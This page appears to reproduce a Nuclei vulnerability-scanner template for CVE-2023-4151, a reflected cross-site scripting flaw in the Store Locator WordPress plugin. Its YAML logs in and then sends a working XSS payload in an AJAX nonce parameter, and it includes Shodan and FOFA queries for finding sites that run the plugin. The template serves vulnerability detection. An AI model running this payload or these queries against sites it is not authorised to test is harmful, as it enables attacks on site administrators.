Skip to content
Nuclei Templates

Store Locator WordPress < 1.4.13 - Cross-Site Scripting

ID: CVE-2023-4151

Severity: medium

Author: ritikchaddha

Tags: cve,cve2024,wp,wordpress,wp-plugin,agile-store-locator,xss

Description

Section titled “Description”

The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

YAML Source

Section titled “YAML Source”
id: CVE-2023-4151


info:
  name: Store Locator WordPress < 1.4.13 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Update the plugin to Latest version. Fixed in 1.4.13.
  reference:
    - https://wpscan.com/vulnerability/c9d80aa4-a26d-4b3f-b7bf-9d2fb0560d7b/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4151
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4151
    cwe-id: CWE-79
    epss-score: 0.00063
    epss-percentile: 0.27983
    cpe: cpe:2.3:a:agilelogix:store_locator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: agilelogix
    product: store_locator
    framework: wordpress
    fofa-query: body="/wp-content/plugins/agile-store-locator"
    publicwww-query: /wp-content/plugins/agile-store-locator/
    shodan-query: http.html:"/wp-content/plugins/agile-store-locator/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,agile-store-locator,xss


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/agile-store-locator"
        internal: true


  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In


      - |
        GET /wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`document.domain`> HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '<img src onerror=alert`document.domain`>'


      - type: word
        part: content_type_2
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4a0a00473045022038a46f8d0e75d21a77d2fe44708c907108b19db8b38f7917ff5556100cbc3176022100ca191cca5eb4134af15433c55e0416a06082f9dbe10c16eb441d8505831c1fb0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4151.yaml"

View on Github